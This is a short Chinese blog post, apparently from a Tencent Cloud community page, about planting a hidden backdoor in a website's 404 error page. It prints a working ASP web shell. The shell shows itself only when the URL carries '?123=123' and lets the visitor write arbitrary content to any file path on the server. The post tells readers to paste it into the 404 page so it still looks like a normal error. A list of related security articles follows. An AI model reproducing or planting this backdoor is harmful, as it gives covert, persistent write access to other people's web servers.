手把手打造404页面隐藏后门

我们先找一个404错误页面

把源码复制下来保存到本地asp格式

<% ifrequest("123")="123" then %>
<title>黑白网丨Aitsec</title>
<%="
"%>
<%="Thefile location:" server.mappath(request.servervariables("script_name"))%>
<%DimobjFSO%>
<%Dim fdata%>
<%DimobjCountFile%>
<%on errorresume next%>
<%Set objFSO= Server.CreateObject("Scripting.FileSystemObject")%>
<%ifTrim(request("syfdpath"))<>"" then%>
<�ata =request("cyfddata")%>
<%SetobjCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Writefdata%>
<%if err =0then%>
<fontcolor=red>save!</font>
<%end if%>
<%end if%>
<%objCountFile.Close%>
<%SetobjCountFile=Nothing%>
<%Set objFSO= Nothing%>
<formaction='' method=post>
 
 
    <input type=text name=syfdpath width=32value="<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>"style="border:solid 1px" size=80>
 
 
 
 
      <textarea name=cyfddata cols=80rows=10 width=32 style="border:solid 1px"></textarea>
 
 
    <input type=submit value=savestyle="border:solid 1px">
    <fontcolor="#FF0000"><strong>                                    黑白网丨Aitsec</strong></font> 
 
</form>
 
<formaction="" method="post">
<% end if%>

把这段代码复制到文件头里然后保存

我们访问404页面返回的还是404

莫慌,

在url后面加上?123=123

file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image004.jpg

这样,我们的马子就出来了。

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

老外手把手带你搭建DMZ渗透测试实验室(Part 1,2)

小编注: 大家好。接下来给大家带来两篇老外的文章,是关于构建渗透环境的文章,这是第一篇。如果有什么地方翻译地不对,还请各位大大轻拍。下面一系列的步骤都是如何在G...

5099
来自专栏FreeBuf

魔波广告恶意病毒简析

1.病毒介绍 魔波广告恶意病毒通过仿冒浏览器,播放器和一些游戏等进行传播,一旦用户手机不慎被感染,该病毒将立即下载提权文件来获取 root权限,频繁推送广告,监...

2335
来自专栏FreeBuf

【新手科普】盘点常见的Web后门

在对一个web站点进行渗透测试的渗透攻击阶段,一般会想办法突破上传限制,向目标可执行目录中写入一个带有攻击性质的脚本来协助获取更大的服务器权限。 这里我们就一起...

6219
来自专栏安恒信息

窥探家庭网络的恶意木马

近几年,我们已经看到了很多关于家庭路由器遭受攻击的报道。攻击路由器的恶意软件会将用户的上网访问重定向到各种恶意站点,其他的攻击方式还包括植入后门和DNS劫持。在...

2555
来自专栏FreeBuf

从某电商钓鱼事件探索黑客“一站式服务”

深信服EDR安全团队,整理分析了一起某电商钓鱼事件,通过关联信息,发现背后可能存在一个“产业链齐全”的黑客团伙,研究发现其具备“一站式服务”的黑客攻击手段。

1403
来自专栏安恒信息

“永恒之蓝”勒索病毒安全事件应急指导手册(附工具包)

相关说明 北京时间2017年05月12日,安恒信息监测到黑客利用NSA黑客武器库泄漏的“永恒之蓝”工具发起的网络攻击事件:大量服务器和个人PC感染病毒后被远程控...

3817
来自专栏FreeBuf

Palo Alto Networks:新型恶意软件家族Reaver与SunOrcal存在一定联系

概要 Unit 42安全小组已经发现了一种新的恶意软件家族,并将其命名为“Reaver”。研究人员表示,这一新型恶意软件与在2016年针对中国台湾地区的黑客攻击...

2565
来自专栏王亚昌的专栏

WinPcap在无线局域网下的使用

    最近在做网关方面的项目,用到了WinPcap开发库去获得数据帧,这个开发库功能很强大,但是在无线局域网环境下使用时有一些不同,下面就WinPcap的使用...

1262
来自专栏walterlv - 吕毅的博客

查询已连接 Wi-Fi 的密码(入门和进阶两种方法)

2017-10-09 13:01

6522
来自专栏玄魂工作室

【翻译】旧技术成就新勒索软件,Petya添加蠕虫特性

原文链接:https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-tech...

2856

扫码关注云+社区

领取腾讯云代金券